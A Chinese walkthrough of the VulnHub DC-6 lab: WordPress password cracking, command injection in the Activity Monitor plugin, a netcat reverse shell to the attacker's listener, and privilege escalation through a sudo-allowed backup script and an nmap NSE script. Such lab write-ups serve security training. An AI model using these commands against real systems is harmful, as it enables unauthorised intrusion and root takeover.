靶场的搭建
从官网直接用迅雷下载就会快一点:https://www.vulnhub.com/entry/dc-6,315/,解压之后用vm直接打开ova文件即可,要注意一下靶机和攻击机(kali)要在同一个局域网内哦!!!,比如我这里的靶机和攻击机都是用net模式连接的网络
信息收集
主机扫描
得到靶场的ip为:192.168.2.139
端口扫描
开放的端口为22、80
目录扫描
有一个登录的目录
网站信息扫描
网址被重定向了,需要改一下hosts的配置文件,具体的原理你可以看一下我的dc-2靶场的解释
重新打开网址发现正常回显,而且我们可以发现它的指纹识别的cms是wordPress 5.1.1
信息收集总结
开放的端口:20、80
登录的目录:http://wordy/wp-login.php?action=register
系统cms是wordPress 5.1.1
漏洞利用
80端口
我们前面由80端口已经得到了系统的指纹识别
22端口
22端口开放,可以ssh连接,但是我们没有用户名和密码,无法直接连接,先放一放
cms的利用
cms是wordpress,而且发现了一个登录的页面,我们首先要先破解账号名和密码
密码破解
我们先尝试用cewl进行密码收集,发现行不通再考虑用kali自带的密码字典usr/share/wordists/rockyou.txt,由于字典太大,我们先把密码过滤出来
cat rockyou.txt | grep k01 > dc6.txt
账号名收集
在Wordpress中,有一个kali自带的工具,专门针对该wordpress系统的扫描工具
收集到了用户名,保存在文件dc6user.txt上
匹配账号名和密码
根据前面的字典,就可以得到账号名和密码:mark / helpdesk01
登录成功
我们发现有一个插件的工具activity monitor,可以利用这个插件漏洞进行远程命令连接
activity monitor插件漏洞
远程命令执行
我们发现管道符命令注入成功,说明存在漏洞,但是我们的输入长度被限制了,我们改一下长度,按f12找出maxlength函数,把15改大一点,我这里改到100
反弹shell
建立kali的监听端口
反弹shell
nc -e /bin/bash 192.168.2.129 7777
反弹成功
进入交互式模式
python -c 'import pty;pty.spawn("/bin/bash")'
逛了一下home目录
graham用户
该用户下没有什么可以直接利用的信息或者文件
jens用户
发现有一个脚本文件,看了一下文件内容,暂时没有利用的方式
sarah用户
mark用户
发现有一个txt文件,里面有graham用户的密码GSo7isUM1D4,而且前面我们的信息收集已经知道靶机开放了ssh 22端口,我们可以用graham用户进行ssh连接
ssh连接
登录成功
发现有一个可疑的目录lost+found,但是没有权限进不去,先查看一下目前用户能执行的文件
sudo -l
发现我们可以执行/home/jens/backups.sh脚本,脚本注释的信息提示我们先把/bin/bash写入脚本内,再用jens用户执行
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
成功切换成jens用户,我们再来逛逛这个用户下有什么提示,不s心的我想看看lost+found到底有什么,发现还是没有权限,没办法只能先看看这个jens用户有什么权限
发现/usr/bin/nmap,但是要以root用户执行,root用户不就是我们想要的最终超级权限吗?不要激动哈哈哈,先看看/usr/bin/nmap里面有什么东西,里面的文件是一堆乱码,再想想
nmap的nse脚本提权
前面提示我们nmap可以执行root,我们可以Nmap的NSE脚本提权(NSE是Nmap的一个强大的功能,允许用户编写脚本来扩展Nmap的功能。)如果Nmap以root权限运行,可以通过编写NSE脚本来执行提权操作
所以我们先创建一个脚本并执行该脚本,这里要注意的是一定要在jens目录下执行该脚本才有权限
echo "os.execute('/bin/bash')">demon.nse //nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=demon.nse //执行此脚本
提权成功GET flag
已经利用nmap脚本成功提权到root,接下来就是进入root目录找flag啦
原文始发于微信公众号(Cauchy网安):【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论